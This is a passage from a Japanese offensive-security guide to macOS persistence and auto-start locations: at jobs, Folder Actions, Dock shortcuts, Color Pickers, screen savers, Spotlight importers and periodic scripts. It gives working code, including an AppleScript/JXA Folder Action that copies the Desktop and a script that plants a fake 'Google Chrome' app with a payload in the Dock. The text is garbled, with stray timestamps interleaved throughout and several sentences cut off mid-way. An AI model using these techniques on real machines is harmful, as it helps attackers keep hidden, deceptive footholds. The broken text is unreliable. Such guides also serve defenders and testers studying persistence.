これらのアイテムは、ファイル**`~/Library/Application Support/com.apple.backgroundtaskmanagementagent`**に保存されます。
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
**ログインアイテム**は、API [SMLoginItemSetEnabled ](https://developer.apple.com/documentation/servicemanagement/1501557-smloginitemsetenabled?language=objc )を使用して指定することもできます。このAPIは、設定を**`/var/db/com.apple.xpc.launchd/loginitems.501.plist`**に保存します。
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
### ログインアイテムとしてのZIP
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
(ログインアイテムに関する前のセクションを確認してください。これは拡張です)
2023-09-28 20:14:46 +00:00
2023-10-01 18:13:43 +00:00
**ZIP**ファイルを**ログインアイテム**として保存すると、**`Archive Utility`**がそれを開きます。たとえば、ZIPが**`~/Library`**に保存され、フォルダ**`LaunchAgents/file.plist`**がバックドアを含んでいる場合、そのフォルダが作成され( )
2023-09-28 20:14:46 +00:00
2023-10-01 18:13:43 +00:00
別のオプションとして、ユーザーのホームディレクトリに**`.bash_profile`**と**`.zshenv`**ファイルを作成することもできます。したがって、LaunchAgentsフォルダが既に存在する場合でも、このテクニックは機能します。
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
### At
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
解説: [https://theevilbit.github.io/beyond/beyond\_0014/ ](https://theevilbit.github.io/beyond/beyond\_0014/ )
2023-09-28 20:14:46 +00:00
2023-10-01 18:13:43 +00:00
#### 位置
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
* **`at`**を**実行する**必要があり、**有効化**されている必要があります。
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
#### **説明**
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
「atタスク」は、**特定の時間にタスクをスケジュールする**ために使用されます。\
2023-10-01 18:13:43 +00:00
これらのタスクはcronと異なり、**一度だけ実行された後に削除**される**一時的なタスク**です。ただし、システムの再起動後も残るため、潜在的な脅威として排除することはできません。
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
**デフォルトでは**無効ですが、**root**ユーザーは次のコマンドで**有効化**できます:
```bash
sudo launchctl load -F /System/Library/LaunchDaemons/com.apple.atrun.plist
```
これにより、1時間後にファイルが作成されます。
```bash
echo "echo 11 > /tmp/at.txt" | at now+1
```
`atq` コマンドを使用してジョブキューを確認します:
```shell-session
sh-3.2# atq
26 Tue Apr 27 00:46:00 2021
22 Wed Apr 28 00:29:00 2021
```
2023-10-01 18:13:43 +00:00
上記では、2つのスケジュールされたジョブが表示されています。`at -c JOBNUMBER`を使用して、ジョブの詳細を出力できます。
2023-09-28 20:26:51 +00:00
```shell-session
sh-3.2# at -c 26
#!/bin/sh
# atrun uid=0 gid=0
# mail csaby 0
umask 22
SHELL=/bin/sh; export SHELL
TERM=xterm-256color; export TERM
USER=root; export USER
SUDO_USER=csaby; export SUDO_USER
SUDO_UID=501; export SUDO_UID
SSH_AUTH_SOCK=/private/tmp/com.apple.launchd.co51iLHIjf/Listeners; export SSH_AUTH_SOCK
__CF_USER_TEXT_ENCODING=0x0:0:0; export __CF_USER_TEXT_ENCODING
MAIL=/var/mail/root; export MAIL
PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin; export PATH
PWD=/Users/csaby; export PWD
SHLVL=1; export SHLVL
SUDO_COMMAND=/usr/bin/su; export SUDO_COMMAND
HOME=/var/root; export HOME
LOGNAME=root; export LOGNAME
LC_CTYPE=UTF-8; export LC_CTYPE
SUDO_GID=20; export SUDO_GID
_=/usr/bin/at; export _
cd /Users/csaby || {
echo 'Execution directory inaccessible' >& 2
exit 1
}
unset OLDPWD
echo 11 > /tmp/at.txt
```
{% hint style="warning" %}
ATタスクが有効になっていない場合、作成されたタスクは実行されません。
{% endhint %}
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
**ジョブファイル**は`/private/var/at/jobs/`にあります。
```
sh-3.2# ls -l /private/var/at/jobs/
total 32
-rw-r--r-- 1 root wheel 6 Apr 27 00:46 .SEQ
-rw------- 1 root wheel 0 Apr 26 23:17 .lockfile
-r-------- 1 root wheel 803 Apr 27 00:46 a00019019bdcd2
-rwx------ 1 root wheel 803 Apr 27 00:46 a0001a019bdcd2
```
ファイル名には、キュー、ジョブ番号、および実行予定時刻が含まれています。例えば、`a0001a019bdcd2`を見てみましょう。
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
* `a` - これはキューです
* `0001a` - 16進数でのジョブ番号、`0x1a = 26`
* `019bdcd2` - 16進数での時間。エポックから経過した分数を表します。`0x019bdcd2`は10進数で`26991826`です。これを60倍すると`1619509560`になります。これは`GMT: 2021年4月27日、火曜日7時46分00秒`です。
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
ジョブファイルを印刷すると、`at -c`を使用して得た情報と同じ情報が含まれていることがわかります。
### フォルダーアクション
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
解説: [https://theevilbit.github.io/beyond/beyond\_0024/ ](https://theevilbit.github.io/beyond/beyond\_0024/ )\
解説: [https://posts.specterops.io/folder-actions-for-persistence-on-macos-8923f222343d ](https://posts.specterops.io/folder-actions-for-persistence-on-macos-8923f222343d )
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
* サンドボックスをバイパスするのに便利: [✅ ](https://emojipedia.org/check-mark-button )
* ただし、引数を指定してosascriptを呼び出し、フォルダーアクションを設定できる必要があります。
2023-09-28 20:14:46 +00:00
#### 場所
2023-09-28 20:26:51 +00:00
* **`/Library/Scripts/Folder Action Scripts`**
* ルート権限が必要です
* **トリガー**: 指定されたフォルダへのアクセス
* **`~/Library/Scripts/Folder Action Scripts`**
* **トリガー**: 指定されたフォルダへのアクセス
2023-09-28 20:14:46 +00:00
#### 説明と攻撃手法
2023-09-28 20:26:51 +00:00
フォルダーアクションスクリプトは、アタッチされているフォルダにアイテムが追加または削除された場合、またはウィンドウが開かれたり閉じられたり移動したりサイズが変更されたりすると実行されます。
2023-09-28 20:14:46 +00:00
* Finder UIを介してフォルダを開く
2023-09-28 23:15:43 +00:00
* フォルダにファイルを追加する(ドラッグ&ドロップまたはターミナルからのシェルプロンプトでも可能)
* フォルダからファイルを削除する(ドラッグ&ドロップまたはターミナルからのシェルプロンプトでも可能)
2023-09-28 20:26:51 +00:00
* UIを介してフォルダから移動する
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
これを実装する方法はいくつかあります。
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
1. [Automator ](https://support.apple.com/guide/automator/welcome/mac )プログラムを使用して、フォルダーアクションワークフローファイル(.workflow)
2. フォルダを右クリックし、「フォルダーアクションの設定...」を選択し、「サービスを実行」を選択し、スクリプトを手動でアタッチします。
3. OSAScriptを使用して、Apple Eventメッセージを`System Events.app`に送信し、新しい`フォルダーアクション`をプログラムでクエリおよび登録します。
2023-09-28 20:14:46 +00:00
2023-09-28 23:15:43 +00:00
* これは、OSAScriptを使用してApple Eventメッセージを`System Events.app`に送信して永続性を実装する方法です。
2023-09-28 20:14:46 +00:00
実行されるスクリプトは次のとおりです:
{% code title="source.js" %}
```applescript
var app = Application.currentApplication();
app.includeStandardAdditions = true;
app.doShellScript("touch /tmp/folderaction.txt");
app.doShellScript("touch ~/Desktop/folderaction.txt");
app.doShellScript("mkdir /tmp/asd123");
app.doShellScript("cp -R ~/Desktop /tmp/asd123");
```
{% endcode %}
2023-09-28 23:15:43 +00:00
次のスクリプトを実行して、フォルダアクションを有効にし、以前にコンパイルされたスクリプトをフォルダ ** `/users/username/Desktop` ** に添付します。
2023-09-28 20:14:46 +00:00
```applescript
tell application "Finder"
set folderPath to POSIX file "/users/username/Desktop" as alias
set scriptPath to POSIX file "/path/to/folder.scpt" as alias
set folderActionsEnabled to folder actions enabled
if not folderActionsEnabled then
set folder actions enabled to true
end if
2023-09-28 23:15:43 +00:00
try
set currentScripts to scripts of folder folderPath
repeat with currentScript in currentScripts
if name of currentScript is equal to "folder" then
remove currentScript
end if
end repeat
end try
make new script file at folderPath with properties {name:"folder", contents:scriptPath}
2023-09-28 20:14:46 +00:00
end tell
```
2023-09-28 23:15:43 +00:00
2023-10-01 18:13:43 +00:00
このスクリプトを実行すると、指定したフォルダにフォルダアクションが有効になり、以前にコンパイルされたスクリプトが添付されます。
2023-09-28 20:14:46 +00:00
```javascript
var se = Application("System Events");
se.folderActionsEnabled = true;
var myScript = se.Script({name: "source.js", posixPath: "/tmp/source.js"});
var fa = se.FolderAction({name: "Desktop", path: "/Users/username/Desktop"});
se.folderActions.push(fa);
fa.scripts.push(myScript);
```
2023-09-28 23:15:43 +00:00
スクリプトを実行するには、次のコマンドを使用します:`osascript -l JavaScript /Users/username/attach.scpt`
2023-09-28 20:14:46 +00:00
2023-09-28 23:15:43 +00:00
* これはGUIを介して永続性を実装する方法です:
2023-09-28 20:14:46 +00:00
実行されるスクリプトは次のとおりです:
{% code title="source.js" %}
```applescript
var app = Application.currentApplication();
app.includeStandardAdditions = true;
app.doShellScript("touch /tmp/folderaction.txt");
app.doShellScript("touch ~/Desktop/folderaction.txt");
app.doShellScript("mkdir /tmp/asd123");
app.doShellScript("cp -R ~/Desktop /tmp/asd123");
```
{% endcode %}
2023-09-28 23:15:43 +00:00
次のコマンドでコンパイルします: `osacompile -l JavaScript -o folder.scpt source.js`
2023-09-28 20:14:46 +00:00
2023-09-28 23:15:43 +00:00
次の場所に移動します:
2023-09-28 20:14:46 +00:00
```bash
mkdir -p "$HOME/Library/Scripts/Folder Action Scripts"
mv /tmp/folder.scpt "$HOME/Library/Scripts/Folder Action Scripts"
```
2023-10-01 18:13:43 +00:00
次に、「Folder Actions Setup」アプリを開き、**監視したいフォルダ**を選択し、この場合は**`folder.scpt`**( )
2023-09-28 20:14:46 +00:00
< figure > < img src = "../.gitbook/assets/image (2).png" alt = "" width = "297" > < figcaption > < / figcaption > < / figure >
これで、**Finder**でそのフォルダを開くと、スクリプトが実行されます。
2023-10-01 18:13:43 +00:00
この設定は、**base64形式で保存された**plistファイルに保存されています。場所は**`~/Library/Preferences/com.apple.FolderActionsDispatcher.plist`**です。
2023-09-28 20:14:46 +00:00
2023-10-01 18:13:43 +00:00
次に、GUIアクセスなしでこの永続化を準備してみましょう。
2023-09-28 20:14:46 +00:00
1. ** `~/Library/Preferences/com.apple.FolderActionsDispatcher.plist` **をバックアップするために`/tmp`にコピーします:
* `cp ~/Library/Preferences/com.apple.FolderActionsDispatcher.plist /tmp`
2. さきほど設定したフォルダアクションを**削除**します:
< figure > < img src = "../.gitbook/assets/image (3).png" alt = "" > < figcaption > < / figcaption > < / figure >
これで、空の環境ができました。
3. バックアップファイルをコピーします:`cp /tmp/com.apple.FolderActionsDispatcher.plist ~/Library/Preferences/`
4. この設定を適用するために、Folder Actions Setup.appを開きます:
{% hint style="danger" %}
私の場合はうまくいきませんでしたが、これがwriteupの指示です:(
{% endhint %}
2023-09-28 20:26:51 +00:00
### Spotlight Importers
Writeup: [https://theevilbit.github.io/beyond/beyond\_0011/ ](https://theevilbit.github.io/beyond/beyond\_0011/ )
* サンドボックスをバイパスするのに便利:[🟠](https://emojipedia.org/large-orange-circle)
* ただし、新しいサンドボックスに入ります
2023-09-28 23:15:43 +00:00
#### 場所
2023-09-28 20:26:51 +00:00
* **`/Library/Spotlight`** 
* **`~/Library/Spotlight`**
#### 説明
2023-10-01 18:13:43 +00:00
**重いサンドボックス**に入ることになるため、おそらくこのテクニックは使用したくないでしょう。
2023-09-28 20:26:51 +00:00
2023-09-28 20:14:46 +00:00
### Dockショートカット
Writeup: [https://theevilbit.github.io/beyond/beyond\_0027/ ](https://theevilbit.github.io/beyond/beyond\_0027/ )
2023-09-28 20:26:51 +00:00
* サンドボックスをバイパスするのに便利:[✅](https://emojipedia.org/check-mark-button)
* ただし、システム内に悪意のあるアプリケーションをインストールする必要があります
2023-09-28 23:15:43 +00:00
#### 場所
2023-09-28 20:14:46 +00:00
* `~/Library/Preferences/com.apple.dock.plist`
2023-09-28 20:26:51 +00:00
* **トリガー**:ドック内のアプリをクリックしたとき
2023-09-28 20:14:46 +00:00
#### 説明と攻撃手法
2023-10-01 18:13:43 +00:00
ドックに表示されるすべてのアプリケーションは、plistファイル**`~/Library/Preferences/com.apple.dock.plist`**で指定されています。
2023-09-28 20:14:46 +00:00
2023-10-01 18:13:43 +00:00
次のコードで、**アプリケーションを追加**することができます:
2023-09-28 20:14:46 +00:00
{% code overflow="wrap" %}
```bash
# Add /System/Applications/Books.app
defaults write com.apple.dock persistent-apps -array-add '< dict > < key > tile-data< / key > < dict > < key > file-data< / key > < dict > < key > _CFURLString< / key > < string > /System/Applications/Books.app< / string > < key > _CFURLStringType< / key > < integer > 0< / integer > < / dict > < / dict > < / dict > '
# Restart Dock
killall Dock
```
{% endcode %}
2023-09-28 21:24:31 +00:00
いくつかの**ソーシャルエンジニアリング**を使用すると、ドック内でGoogle Chromeなどを**なりすまし**、実際に独自のスクリプトを実行することができます。
```bash
#!/bin/sh
# THIS REQUIRES GOOGLE CHROME TO BE INSTALLED (TO COPY THE ICON)
rm -rf /tmp/Google\ Chrome.app/ 2>/dev/null
# Create App structure
mkdir -p /tmp/Google\ Chrome.app/Contents/MacOS
mkdir -p /tmp/Google\ Chrome.app/Contents/Resources
# Payload to execute
echo '#!/bin/sh
open /Applications/Google\ Chrome.app/ &
touch /tmp/ImGoogleChrome' > /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome
chmod +x /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome
# Info.plist
cat < < EOF > /tmp/Google\ Chrome.app/Contents/Info.plist
<?xml version="1.0" encoding="UTF-8"?>
< !DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
< plist version = "1.0" >
< dict >
< key > CFBundleExecutable< / key >
< string > Google Chrome< / string >
< key > CFBundleIdentifier< / key >
< string > com.google.Chrome< / string >
< key > CFBundleName< / key >
< string > Google Chrome< / string >
< key > CFBundleVersion< / key >
< string > 1.0< / string >
< key > CFBundleShortVersionString< / key >
< string > 1.0< / string >
< key > CFBundleInfoDictionaryVersion< / key >
< string > 6.0< / string >
< key > CFBundlePackageType< / key >
< string > APPL< / string >
< key > CFBundleIconFile< / key >
< string > app< / string >
< / dict >
< / plist >
EOF
# Copy icon from Google Chrome
cp /Applications/Google\ Chrome.app/Contents/Resources/app.icns /tmp/Google\ Chrome.app/Contents/Resources/app.icns
# Add to Dock
defaults write com.apple.dock persistent-apps -array-add '< dict > < key > tile-data< / key > < dict > < key > file-data< / key > < dict > < key > _CFURLString< / key > < string > /tmp/Google Chrome.app< / string > < key > _CFURLStringType< / key > < integer > 0< / integer > < / dict > < / dict > < / dict > '
killall Dock
```
2023-09-28 20:26:51 +00:00
### カラーピッカー
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
解説: [https://theevilbit.github.io/beyond/beyond\_0017 ](https://theevilbit.github.io/beyond/beyond\_0017/ )
2023-09-28 20:14:46 +00:00
2023-09-28 21:24:31 +00:00
* サンドボックスをバイパスするのに役立つ: [🟠 ](https://emojipedia.org/large-orange-circle )
* 非常に具体的なアクションが必要です
* 別のサンドボックスに入ります
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
#### 場所
2023-09-28 20:14:46 +00:00
* `/Library/ColorPickers`  
2023-09-28 21:24:31 +00:00
* ルート権限が必要です
2023-09-28 20:26:51 +00:00
* トリガー: カラーピッカーを使用する
2023-09-28 20:14:46 +00:00
* `~/Library/ColorPickers`
2023-09-28 20:26:51 +00:00
* トリガー: カラーピッカーを使用する
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
#### 説明とエクスプロイト
2023-09-28 20:14:46 +00:00
2023-09-28 21:24:31 +00:00
コードと一緒にカラーピッカーのバンドルをコンパイルします(たとえば、[**この例**](https://github.com/viktorstrate/color-picker-plus)を使用できます)。そして、コンストラクタを追加します([スクリーンセーバーセクション](macos-auto-start-locations.md#screen-saver)のように)そして、バンドルを`~/Library/ColorPickers`にコピーします。
2023-09-28 20:14:46 +00:00
その後、カラーピッカーがトリガーされると、あなたのコードも実行されるはずです。
2023-09-28 21:24:31 +00:00
注意してください、あなたのライブラリをロードするバイナリは非常に制限のあるサンドボックスを持っています: `/System/Library/Frameworks/AppKit.framework/Versions/C/XPCServices/LegacyExternalColorPickerService-x86_64.xpc/Contents/MacOS/LegacyExternalColorPickerService-x86_64`
2023-09-28 20:14:46 +00:00
{% code overflow="wrap" %}
```bash
[Key] com.apple.security.temporary-exception.sbpl
[Value]
[Array]
[String] (deny file-write* (home-subpath "/Library/Colors"))
[String] (allow file-read* process-exec file-map-executable (home-subpath "/Library/ColorPickers"))
[String] (allow file-read* (extension "com.apple.app-sandbox.read"))
2023-06-01 21:09:46 +00:00
```
2023-09-28 20:14:46 +00:00
{% endcode %}
2023-09-28 20:26:51 +00:00
### Finder Syncプラグイン
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
**解説**: [https://theevilbit.github.io/beyond/beyond\_0026/ ](https://theevilbit.github.io/beyond/beyond\_0026/ )\
**解説**: [https://objective-see.org/blog/blog\_0x11.html ](https://objective-see.org/blog/blog\_0x11.html )
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
* サンドボックスをバイパスするために役立つ: **いいえ、自分自身のアプリを実行する必要があるため**
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
#### 位置
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
* 特定のアプリ
2023-06-01 21:09:46 +00:00
2023-09-28 20:26:51 +00:00
#### 説明とエクスプロイト
2023-06-01 21:09:46 +00:00
2023-10-01 18:13:43 +00:00
Finder Sync拡張機能を持つアプリケーションの例は[**こちらで見つけることができます**](https://github.com/D00MFist/InSync)。
2023-06-01 21:09:46 +00:00
2023-09-28 21:24:31 +00:00
アプリケーションは`Finder Sync Extensions`を持つことができます。この拡張機能は実行されるアプリケーションの内部に配置されます。さらに、拡張機能が自身のコードを実行できるようにするためには、**有効なApple開発者証明書で署名**されている必要があり、**サンドボックス化**されている必要があります(ただし、緩和された例外が追加される場合もあります)。また、次のようなものに登録されている必要があります:
2023-06-01 21:09:46 +00:00
```bash
2023-09-28 20:26:51 +00:00
pluginkit -a /Applications/FindIt.app/Contents/PlugIns/FindItSync.appex
pluginkit -e use -i com.example.InSync.InSync
2023-06-01 21:09:46 +00:00
```
2023-09-28 20:14:46 +00:00
### スクリーンセーバー
解説: [https://theevilbit.github.io/beyond/beyond\_0016/ ](https://theevilbit.github.io/beyond/beyond\_0016/ )\
解説: [https://posts.specterops.io/saving-your-access-d562bf5bf90b ](https://posts.specterops.io/saving-your-access-d562bf5bf90b )
2023-09-28 20:26:51 +00:00
* サンドボックスをバイパスするのに便利: [🟠 ](https://emojipedia.org/large-orange-circle )
* ただし、一般的なアプリケーションのサンドボックスになります
2023-09-28 20:14:46 +00:00
#### 場所
* `/System/Library/Screen Savers`  
2023-09-28 20:26:51 +00:00
* ルート権限が必要
* **トリガー**: スクリーンセーバーを選択する
2023-09-28 20:14:46 +00:00
* `/Library/Screen Savers`
2023-09-28 20:26:51 +00:00
* ルート権限が必要
* **トリガー**: スクリーンセーバーを選択する
2023-09-28 20:14:46 +00:00
* `~/Library/Screen Savers`
2023-09-28 20:26:51 +00:00
* **トリガー**: スクリーンセーバーを選択する
2023-09-28 20:14:46 +00:00
< figure > < img src = "../.gitbook/assets/image (1).png" alt = "" width = "375" > < figcaption > < / figcaption > < / figure >
2023-09-28 20:26:51 +00:00
#### 説明とエクスプロイト
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
Xcodeで新しいプロジェクトを作成し、新しい**スクリーンセーバー**を生成するためのテンプレートを選択します。次に、ログを生成するための以下のコードなどを追加します。
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
**ビルド**し、`.saver`バンドルを**`~/Library/Screen Savers`**にコピーします。その後、スクリーンセーバーGUIを開き、それをクリックするだけで、多くのログが生成されるはずです:
2023-09-28 20:14:46 +00:00
{% code overflow="wrap" %}
```bash
sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "hello_screensaver"'
Timestamp (process)[PID]
2023-09-27 22:55:39.622369+0200 localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver void custom(int, const char ** )
2023-09-27 22:55:39.622623+0200 localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver -[ScreenSaverExampleView initWithFrame:isPreview:]
2023-09-27 22:55:39.622704+0200 localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver -[ScreenSaverExampleView hasConfigureSheet]
```
{% endcode %}
{% hint style="danger" %}
このコードを読み込むバイナリ(`/System/Library/Frameworks/ScreenSaver.framework/PlugIns/legacyScreenSaver.appex/Contents/MacOS/legacyScreenSaver`)の権限情報には、**`com.apple.security.app-sandbox`**が含まれているため、**一般的なアプリケーションのサンドボックス内**にいることに注意してください。
{% endhint %}
セーバーコード:
```objectivec
//
// ScreenSaverExampleView.m
// ScreenSaverExample
//
// Created by Carlos Polop on 27/9/23.
//
#import "ScreenSaverExampleView.h"
@implementation ScreenSaverExampleView
- (instancetype)initWithFrame:(NSRect)frame isPreview:(BOOL)isPreview
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__ );
self = [super initWithFrame:frame isPreview:isPreview];
if (self) {
[self setAnimationTimeInterval:1/30.0];
}
return self;
}
- (void)startAnimation
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__ );
[super startAnimation];
}
- (void)stopAnimation
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__ );
[super stopAnimation];
}
- (void)drawRect:(NSRect)rect
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__ );
[super drawRect:rect];
}
- (void)animateOneFrame
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__ );
return;
}
- (BOOL)hasConfigureSheet
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__ );
return NO;
}
- (NSWindow*)configureSheet
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__ );
return nil;
}
__attribute__((constructor))
void custom(int argc, const char **argv) {
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__ );
}
2023-09-28 20:26:51 +00:00
@end
2023-09-28 20:14:46 +00:00
```
2023-10-01 18:13:43 +00:00
### スポットライトプラグイン
サンドボックスをバイパスするのに便利: [🟠 ](https://emojipedia.org/large-orange-circle )
* ただし、アプリケーションのサンドボックスに入ります
#### 場所
* `~/Library/Spotlight/`
* **トリガー**: スポットライトプラグインが管理する拡張子を持つ新しいファイルが作成されるとき
* `/Library/Spotlight/`
* **トリガー**: スポットライトプラグインが管理する拡張子を持つ新しいファイルが作成されるとき
* ルート権限が必要です
* `/System/Library/Spotlight/`
* **トリガー**: スポットライトプラグインが管理する拡張子を持つ新しいファイルが作成されるとき
* ルート権限が必要です
* `Some.app/Contents/Library/Spotlight/`
* **トリガー**: スポットライトプラグインが管理する拡張子を持つ新しいファイルが作成されるとき
* 新しいアプリが必要です
#### 説明と攻撃手法
スポットライトは、macOSの組み込みの検索機能であり、ユーザーがコンピュータ上のデータに迅速かつ包括的にアクセスできるように設計されています。\
この迅速な検索機能を実現するために、スポットライトは**専用のデータベース**を維持し、ほとんどのファイルを**解析してインデックスを作成**し、ファイル名とその内容の両方を素早く検索することができます。
スポットライトの基本的なメカニズムは、'mds'という中央プロセスによって実現されており、これは**'メタデータサーバ'**の略です。このプロセスはスポットライトサービス全体を統括しています。これに加えて、複数の'mdworker'デーモンがあり、さまざまなメンテナンスタスクを実行します(`ps -ef | grep mdworker`で確認できます)。これらのタスクは、スポットライトのインポータープラグインまたは**".mdimporterバンドル"**によって可能になり、さまざまなファイル形式のコンテンツを理解してインデックス化することができます。
プラグインまたは**`.mdimporter`**バンドルは、前述の場所に配置されており、新しいバンドルが現れるとすぐにロードされます(サービスの再起動は不要です)。これらのバンドルは、管理できる**ファイルタイプと拡張子**を示さなければなりません。このようにして、スポットライトは、指定された拡張子を持つ新しいファイルが作成されたときにこれらのバンドルを使用します。
すべてのロードされた`mdimporter`を見つけるには、次を実行します:
```bash
mdimport -L
Paths: id(501) (
"/System/Library/Spotlight/iWork.mdimporter",
"/System/Library/Spotlight/iPhoto.mdimporter",
"/System/Library/Spotlight/PDF.mdimporter",
[...]
```
例えば、**/Library/Spotlight/iBooksAuthor.mdimporter**は、これらの種類のファイル(拡張子`.iba`および`.book`など)を解析するために使用されます。
```json
plutil -p /Library/Spotlight/iBooksAuthor.mdimporter/Contents/Info.plist
[...]
"CFBundleDocumentTypes" => [
0 => {
"CFBundleTypeName" => "iBooks Author Book"
"CFBundleTypeRole" => "MDImporter"
"LSItemContentTypes" => [
0 => "com.apple.ibooksauthor.book"
1 => "com.apple.ibooksauthor.pkgbook"
2 => "com.apple.ibooksauthor.template"
3 => "com.apple.ibooksauthor.pkgtemplate"
]
"LSTypeIsPackage" => 0
}
]
[...]
=> {
"UTTypeConformsTo" => [
0 => "public.data"
1 => "public.composite-content"
]
"UTTypeDescription" => "iBooks Author Book"
"UTTypeIdentifier" => "com.apple.ibooksauthor.book"
"UTTypeReferenceURL" => "http://www.apple.com/ibooksauthor"
"UTTypeTagSpecification" => {
"public.filename-extension" => [
0 => "iba"
1 => "book"
]
}
}
[...]
```
{% hint style="danger" %}
他の`mdimporter`のPlistをチェックしても、**`UTTypeConformsTo`**のエントリは見つかりません。これは組み込みの_Uniform Type Identifiers_(
さらに、システムのデフォルトプラグインは常に優先されるため、攻撃者はAppleの`mdimporters`によってインデックス化されないファイルにのみアクセスできます。
{% endhint %}
独自のインポータを作成するには、このプロジェクトを使用して開始できます:[https://github.com/megrimm/pd-spotlight-importer](https://github.com/megrimm/pd-spotlight-importer) そして、名前を変更し、**`CFBundleDocumentTypes`**を変更し、**`UTImportedTypeDeclarations`**を追加して、サポートする拡張子をサポートし、**`schema.xml`**でそれらを反映させます。\
次に、関数**`GetMetadataForFile`**のコードを**変更**して、処理された拡張子を持つファイルが作成されたときにペイロードを実行します。
最後に、新しい`.mdimporter`を**ビルドしてコピー**して、3つの前述の場所のいずれかに配置し、**ログを監視**するか、**`mdimport -L.`**をチェックすることで、ロードされたかどうかを確認できます。
### ~~Preference Pane~~
2023-09-28 20:14:46 +00:00
{% hint style="danger" %}
2023-10-01 18:13:43 +00:00
これはもう機能していないようです。
2023-09-28 20:14:46 +00:00
{% endhint %}
2023-10-01 18:13:43 +00:00
解説:[https://theevilbit.github.io/beyond/beyond\_0009/](https://theevilbit.github.io/beyond/beyond\_0009/)
2023-09-28 20:14:46 +00:00
2023-10-01 18:13:43 +00:00
* サンドボックスをバイパスするのに便利:[🟠](https://emojipedia.org/large-orange-circle)
2023-09-28 20:26:51 +00:00
* 特定のユーザーアクションが必要です
2023-09-28 20:14:46 +00:00
#### 場所
2023-09-28 20:26:51 +00:00
* **`/System/Library/PreferencePanes`**
* **`/Library/PreferencePanes`**
* **`~/Library/PreferencePanes`**
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
#### 説明
2023-10-01 18:13:43 +00:00
これはもう機能していないようです。
2023-09-28 20:26:51 +00:00
2023-10-01 18:13:43 +00:00
## Root Sandbox Bypass
2023-09-28 20:26:51 +00:00
{% hint style="success" %}
2023-10-01 18:13:43 +00:00
ここでは、**サンドボックスをバイパス**するために役立つスタート位置を見つけることができます。これにより、**ルート**で何かを**ファイルに書き込むだけで**実行したり、他の**奇妙な条件**を必要としたりすることができます。
2023-09-28 20:26:51 +00:00
{% endhint %}
2023-10-01 18:13:43 +00:00
### Periodic
2023-09-28 20:26:51 +00:00
2023-10-01 18:13:43 +00:00
解説:[https://theevilbit.github.io/beyond/beyond\_0019/](https://theevilbit.github.io/beyond/beyond\_0019/)
2023-09-28 20:26:51 +00:00
2023-10-01 18:13:43 +00:00
* サンドボックスをバイパスするのに便利:[🟠](https://emojipedia.org/large-orange-circle)
2023-09-28 20:26:51 +00:00
* ただし、ルートである必要があります
#### 場所
2023-10-01 18:13:43 +00:00
* `/etc/periodic/daily` 、`/etc/periodic/weekly`、`/etc/periodic/monthly`、`/usr/local/etc/periodic`
2023-09-28 20:26:51 +00:00
* ルートが必要です
2023-10-01 18:13:43 +00:00
* **トリガー**:時間が来たとき
* `/etc/daily.local` 、`/etc/weekly.local`、または`/etc/monthly.local`
2023-09-28 20:26:51 +00:00
* ルートが必要です
2023-10-01 18:13:43 +00:00
* **トリガー**:時間が来たとき
2023-09-28 20:26:51 +00:00
2023-10-01 18:13:43 +00:00
#### 説明と攻撃手法
2023-09-28 20:14:46 +00:00
2023-10-01 18:13:43 +00:00
定期的なスクリプト(**`/etc/periodic`**)は、`/System/Library/LaunchDaemons/com.apple.periodic*`に設定された**ランチデーモン**のために実行されます。`/etc/periodic/`に保存されたスクリプトは、ファイルの所有者として**実行**されるため、潜在的な特権エスカレーションには機能しません。
2023-09-28 20:14:46 +00:00
{% code overflow="wrap" %}
```bash
2023-09-28 20:26:51 +00:00
# Launch daemons that will execute the periodic scripts
ls -l /System/Library/LaunchDaemons/com.apple.periodic*
-rw-r--r-- 1 root wheel 887 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-daily.plist
-rw-r--r-- 1 root wheel 895 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-monthly.plist
